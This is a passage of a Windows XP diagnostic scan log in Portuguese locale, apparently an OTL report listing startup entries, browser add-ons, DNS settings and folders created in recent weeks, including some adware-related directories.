O4 - HKLM..\Run: [nwiz] C:\Arquivos de programas\NVIDIA Corporation\nview\nwiz.exe ()
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Arquivos de programas\Arquivos comuns\Java\Java Update\jusched.exe (Oracle Corporation)
O4 - HKCU..\Run: [Steam] C:\Arquivos de programas\Steam\Steam.exe (Valve Corporation)
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: &Enviar para o OneNote - C:\Arquivos de programas\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O8 - Extra context menu item: E&xportar para o Microsoft Excel - C:\Arquivos de programas\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O9 - Extra Button: Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Arquivos de programas\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Arquivos de programas\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: &Anotações Vinculadas do OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Arquivos de programas\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Anotações Vinculadas do OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Arquivos de programas\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://windowsupdate...b?1369701869125 (WUWebControl Class)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.m...ash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 200.204.0.10 200.204.0.138
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1EF3CAA6-7A5D-4E74-B673-B1DCC6628FFA}: DhcpNameServer = 200.204.0.10 200.204.0.138
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CF923EAE-626C-4D4E-9FE0-A23AB85168CF}: NameServer = 200.204.0.10 200.204.0.138
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de programas\Arquivos comuns\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de programas\Arquivos comuns\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de programas\Arquivos comuns\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de programas\Arquivos comuns\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O24 - Desktop Components:0 (Minha página inicial atual) - About:Home
O24 - Desktop WallPaper: C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/06/07 16:48:49 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O32 - AutoRun File - [2013/05/27 19:43:05 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
========== Files/Folders - Created Within 30 Days ==========
[2013/06/14 11:17:05 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Matheus\Recent
[2013/06/13 13:43:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Funmoods
[2013/06/13 13:43:26 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Driver LM
[2013/06/13 12:59:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\DownLite
[2013/06/13 12:59:03 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Mozilla Firefox
[2013/06/13 12:24:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\GetRightToGo
[2013/06/09 14:17:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Skype
[2013/06/09 14:17:42 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Skype
[2013/06/09 14:17:41 | 000,000,000 | R--D | C] -- C:\Arquivos de programas\Skype
[2013/06/09 14:17:41 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Skype
[2013/06/09 14:17:37 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Skype
[2013/06/08 03:00:29 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\MSXML 4.0
[2013/06/07 18:18:39 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Desktop\Autodesk Inventor
[2013/06/07 18:16:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Autodesk,_Inc
[2013/06/07 18:15:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\GrantaGateway
[2013/06/07 17:06:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Autodesk
[2013/06/07 17:06:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data
[2013/06/07 17:05:49 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Inventor
[2013/06/07 17:02:56 | 000,000,000 | ---D | C] -- C:\MITSI 2012 Temporary Files
[2013/06/07 17:02:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents
[2013/06/07 17:02:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Autodesk
[2013/06/07 17:02:25 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft Chart Controls
[2013/06/07 17:01:21 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft WSE
[2013/06/07 15:02:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Desktop\AutoCAD Mechanical 2012
[2013/06/07 14:53:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\cache
[2013/06/07 14:49:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\FLEXnet
[2013/06/07 13:14:17 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Inventor Server x86 AutoCAD Mechanical 2012 Language Pack - English
[2013/06/07 13:09:56 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Macrovision Shared
[2013/06/07 13:09:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Autodesk
[2013/06/07 13:07:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documentos\Autodesk
[2013/06/07 13:06:06 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Autodesk
[2013/06/07 13:05:15 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Autodesk Shared
[2013/06/07 12:47:31 | 000,000,000 | ---D | C] -- C:\Autodesk
[2013/06/04 15:20:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Media Player Classic
[2013/06/04 15:19:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\Sun
[2013/06/04 15:19:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Sun
[2013/06/04 15:19:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Sun
[2013/06/04 15:19:00 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Java
[2013/06/04 15:18:33 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Java
[2013/06/04 15:11:35 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Sun
[2013/06/03 10:57:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\LolClient
[2013/06/03 10:57:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Macromedia
[2013/06/02 19:21:51 | 000,000,000 | ---D | C] -- C:\WINDOWS\Logs
[2013/06/02 19:19:10 | 000,000,000 | ---D | C] -- C:\Riot Games
[2013/06/02 19:02:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Alcohol 120%
[2013/06/02 19:02:21 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Alcohol Soft
[2013/06/02 19:01:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Hewlett-Packard
[2013/06/02 18:52:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Autodesk
[2013/06/02 18:52:23 | 000,524,288 | ---- | C] (Marvell Semiconductor, Inc.) -- C:\WINDOWS\System32\ZSUM1120.DLL
[2013/06/02 18:52:23 | 000,286,720 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSRI.dll
[2013/06/02 18:52:23 | 000,282,624 | ---- | C] (Marvell Semiconductor, Inc.) -- C:\WINDOWS\System32\ZSDm1120.DLL
[2013/06/02 18:52:23 | 000,172,032 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSDDMUI.dll
[2013/06/02 18:52:23 | 000,155,648 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSD.dll
[2013/06/02 18:52:23 | 000,135,168 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSDDM.DLL
[2013/06/02 18:52:23 | 000,110,592 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZIMFDRV.dll
[2013/06/02 18:52:23 | 000,098,304 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZGDI.dll
[2013/06/02 18:52:23 | 000,073,728 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSDIMF.dll
[2013/06/02 18:52:23 | 000,061,440 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSR.dll
[2013/06/02 18:52:23 | 000,061,440 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSDNT5UI.dll
[2013/06/02 18:52:23 | 000,057,344 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZQDPRINT.DLL
[2013/06/02 18:52:23 | 000,057,344 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZIMFPRNT.DLL
[2013/06/02 18:52:22 | 001,572,864 | ---- | C] (Apache Software Foundation) -- C:\WINDOWS\System32\XERCES-C.DLL
[2013/06/02 18:52:22 | 000,286,720 | ---- | C] (Marvell Semiconductor, Inc.) -- C:\WINDOWS\System32\ZSUXML.dll
[2013/06/02 18:52:22 | 000,065,536 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZJBIG.dll
[2013/06/02 18:48:01 | 000,053,248 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZTAG.dll
[2013/06/02 18:48:00 | 000,135,168 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZLM1120.dll
[2013/06/02 18:48:00 | 000,114,688 | ---- | C] (Marvell) -- C:\WINDOWS\System32\HPMCoSetup.dll
[2013/06/02 18:48:00 | 000,106,496 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZSPOOL.dll
[2013/06/02 18:48:00 | 000,061,440 | ---- | C] (Zenographics, Inc.) -- C:\WINDOWS\System32\ZIMF.DLL
[2013/06/02 18:47:51 | 001,035,408 | ---- | C] (The OpenSSL Project) -- C:\WINDOWS\System32\ltcry15u.dll
[2013/06/02 18:47:50 | 000,172,032 | ---- | C] (Marvell) -- C:\WINDOWS\System32\agmcrdrv.dll
[2013/06/02 18:46:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\HP
[2013/06/02 18:44:36 | 000,221,184 | R--- | C] (TODO: <Company name>) -- C:\WINDOWS\brprs.exe
[2013/06/02 18:44:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\HP
[2013/06/02 18:44:32 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\HP
[2013/06/02 18:44:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\HP
[2013/06/02 18:42:50 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\TEMP
[2013/06/02 18:34:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Autodesk
[2013/06/02 18:34:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Autodesk
[2013/06/02 18:25:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Steam
[2013/06/02 18:18:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\K-Lite Codec Pack
[2013/06/02 18:18:10 | 000,151,552 | ---- | C] (fccHandler) -- C:\WINDOWS\System32\ac3acm.acm
[2013/06/02 18:18:05 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\K-Lite Codec Pack
[2013/06/02 18:16:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\CCleaner
[2013/06/02 18:16:40 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\CCleaner
[2013/06/02 18:14:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Tarma Installer
[2013/06/02 18:03:18 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Steam
[2013/06/02 18:03:17 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Steam
[2013/06/02 18:03:17 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Steam
[2013/05/29 20:42:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Spybot - Search & Destroy
[2013/05/29 20:42:10 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Spybot - Search & Destroy
[2013/05/29 19:24:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Malwarebytes
[2013/05/29 19:24:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Malwarebytes
[2013/05/29 19:15:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\RealVNC
[2013/05/29 19:15:41 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\RealVNC
[2013/05/28 22:06:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\ApplicationHistory
[2013/05/28 21:50:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\WinRAR
[2013/05/28 21:24:59 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\XPSViewer
[2013/05/28 21:24:53 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Reference Assemblies
[2013/05/28 21:24:35 | 000,000,000 | ---D | C] -- C:\a098e5d37745bd4866
[2013/05/28 21:22:25 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\URTTEMP
[2013/05/28 20:48:15 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Matheus\IECompatCache
[2013/05/28 20:48:02 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Matheus\PrivacIE
[2013/05/28 20:18:57 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Matheus\IETldCache
[2013/05/28 19:58:17 | 000,000,000 | ---D | C] -- C:\WINDOWS\ie7updates
[2013/05/28 19:43:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\ie8updates
[2013/05/28 19:41:39 | 000,000,000 | -H-D | C] -- C:\WINDOWS\ie8
[2013/05/27 22:07:42 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\PreInstall
[2013/05/27 22:07:40 | 000,000,000 | -H-D | C] -- C:\WINDOWS\$hf_mig$
[2013/05/27 21:59:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Adobe
[2013/05/27 21:59:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Adobe
[2013/05/27 21:49:29 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Windows Media Connect 2
[2013/05/27 21:48:36 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers\UMDF
[2013/05/27 21:48:36 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\LogFiles
[2013/05/27 21:46:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\WinRAR
[2013/05/27 21:46:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\WinRAR
[2013/05/27 21:46:41 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\WinRAR
[2013/05/27 21:45:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Windows Genuine Advantage
[2013/05/27 21:45:45 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\SoftwareDistribution
[2013/05/27 21:45:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Adobe
[2013/05/27 21:44:56 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Adobe
[2013/05/27 21:44:56 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Adobe
[2013/05/27 21:42:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\SharePoint
[2013/05/27 21:42:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Microsoft Office
[2013/05/27 21:41:44 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\MSBuild
[2013/05/27 21:41:23 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\DESIGNER
[2013/05/27 21:40:58 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft Sync Framework
[2013/05/27 21:40:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Microsoft
[2013/05/27 21:39:59 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft Visual Studio 8
[2013/05/27 21:39:31 | 000,000,000 | ---D | C] -- C:\WINDOWS\SHELLNEW
[2013/05/27 21:39:30 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft Analysis Services
[2013/05/27 21:39:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Microsoft Help
[2013/05/27 21:39:20 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft Office
[2013/05/27 21:39:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Microsoft Help
[2013/05/27 21:39:12 | 000,000,000 | RH-D | C] -- C:\MSOCache
[2013/05/27 21:37:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Real Alternative
[2013/05/27 21:37:38 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Real Alternative
[2013/05/27 21:37:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Real
[2013/05/27 21:37:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Real
[2013/05/27 21:37:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Real
[2013/05/27 21:32:45 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\avast! Free Antivirus
[2013/05/27 21:32:44 | 000,368,944 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2013/05/27 21:32:44 | 000,029,816 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2013/05/27 21:32:43 | 000,056,080 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2013/05/27 21:32:43 | 000,049,760 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2013/05/27 21:32:42 | 000,765,736 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys
[2013/05/27 21:32:41 | 000,229,648 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe
[2013/05/27 21:32:41 | 000,066,336 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswMonFlt.sys
[2013/05/27 21:32:25 | 000,041,664 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2013/05/27 21:32:11 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\AVAST Software
[2013/05/27 21:31:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\AVAST Software
[2013/05/27 21:25:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Intel
[2013/05/27 21:24:52 | 000,000,000 | ---D | C] -- C:\Driver_allOS
[2013/05/27 20:41:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\NVIDIA Corporation
[2013/05/27 20:41:10 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\AGEIA Technologies
[2013/05/27 20:41:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\NVIDIA
[2013/05/27 20:40:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\NVIDIA Corporation
[2013/05/27 20:40:32 | 000,057,344 | ---- | C] (Khronos Group) -- C:\WINDOWS\System32\OpenCL.dll
[2013/05/27 20:37:38 | 000,000,000 | R-SD | C] -- C:\WINDOWS\assembly
[2013/05/27 20:37:28 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\en-US
[2013/05/27 20:37:26 | 000,000,000 | ---D | C] -- C:\WINDOWS\Microsoft.NET
[2013/05/27 20:37:26 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Microsoft.NET
[2013/05/27 20:34:44 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\NVIDIA Corporation
[2013/05/27 20:34:25 | 000,000,000 | ---D | C] -- C:\NVIDIA
[2013/05/27 20:25:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Downloads
[2013/05/27 20:24:31 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome
[2013/05/27 20:23:28 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Google
[2013/05/27 20:23:28 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Google
[2013/05/27 20:19:52 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2013/05/27 20:17:16 | 000,008,704 | R--- | C] (Windows ® Codename Longhorn DDK provider) -- C:\WINDOWS\System32\viahdcpl.cpl
[2013/05/27 20:16:49 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\VIA
[2013/05/27 20:16:47 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\InstallShield
[2013/05/27 20:15:59 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ReinstallBackups
[2013/05/27 20:15:57 | 000,053,248 | ---- | C] (Windows XP Bundled build C-Centric Single User) -- C:\WINDOWS\System32\CSVer.dll
[2013/05/27 20:14:21 | 000,082,032 | R--- | C] (Atheros Communications, Inc.) -- C:\WINDOWS\System32\drivers\l1c51x86.sys
[2013/05/27 20:13:28 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\InstallShield
[2013/05/27 20:12:51 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Common Files
[2013/05/27 20:12:49 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Intel
[2013/05/27 20:12:49 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DRVSTORE
[2013/05/27 20:12:45 | 000,000,000 | ---D | C] -- C:\Intel
[2013/05/27 19:56:43 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Atheros_L1e
[2013/05/27 19:56:40 | 000,000,000 | -H-D | C] -- C:\Arquivos de programas\InstallShield Installation Information
[2013/05/27 19:45:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Identities
[2013/05/27 19:45:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Minhas músicas
[2013/05/27 19:45:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Meus documentos\Minhas imagens
[2013/05/27 19:45:57 | 000,000,000 | -H-D | C] -- C:\Arquivos de programas\Uninstall Information
[2013/05/27 19:45:54 | 000,000,000 | --SD | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Microsoft
[2013/05/27 19:45:54 | 000,000,000 | --SD | C] -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\Microsoft
[2013/05/27 19:45:54 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Matheus\SendTo
[2013/05/27 19:45:54 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Matheus\Dados de aplicativos
[2013/05/27 19:45:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Meus documentos
[2013/05/27 19:45:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar
[2013/05/27 19:45:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Inicializar
[2013/05/27 19:45:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Favoritos
[2013/05/27 19:45:54 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Acessórios
[2013/05/27 19:45:54 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\Matheus\Cookies
[2013/05/27 19:45:54 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Matheus\Modelos
[2013/05/27 19:45:54 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Matheus\Configurações locais
[2013/05/27 19:45:54 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Matheus\Ambiente de rede
[2013/05/27 19:45:54 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\Matheus\Ambiente de impressão
[2013/05/27 19:45:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Matheus\Desktop
[2013/05/27 19:45:13 | 000,000,000 | ---D | C] -- C:\WINDOWS\SoftwareDistribution
[2013/05/27 19:45:12 | 000,000,000 | --SD | C] -- C:\WINDOWS\System32\Microsoft
[2013/05/27 19:45:12 | 000,000,000 | ---D | C] -- C:\WINDOWS\Prefetch
[2013/05/27 19:45:11 | 000,000,000 | --SD | C] -- C:\Documents and Settings\LocalService\Dados de aplicativos\Microsoft
[2013/05/27 19:45:11 | 000,000,000 | --SD | C] -- C:\Documents and Settings\LocalService\Configurações locais\Dados de aplicativos\Microsoft
[2013/05/27 19:45:00 | 000,000,000 | --SD | C] -- C:\Documents and Settings\NetworkService\Dados de aplicativos\Microsoft
[2013/05/27 19:45:00 | 000,000,000 | --SD | C] -- C:\Documents and Settings\NetworkService\Configurações locais\Dados de aplicativos\Microsoft
[2013/05/27 19:44:05 | 000,080,896 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia330.dll
[2013/05/27 19:44:05 | 000,080,896 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rwia001.dll
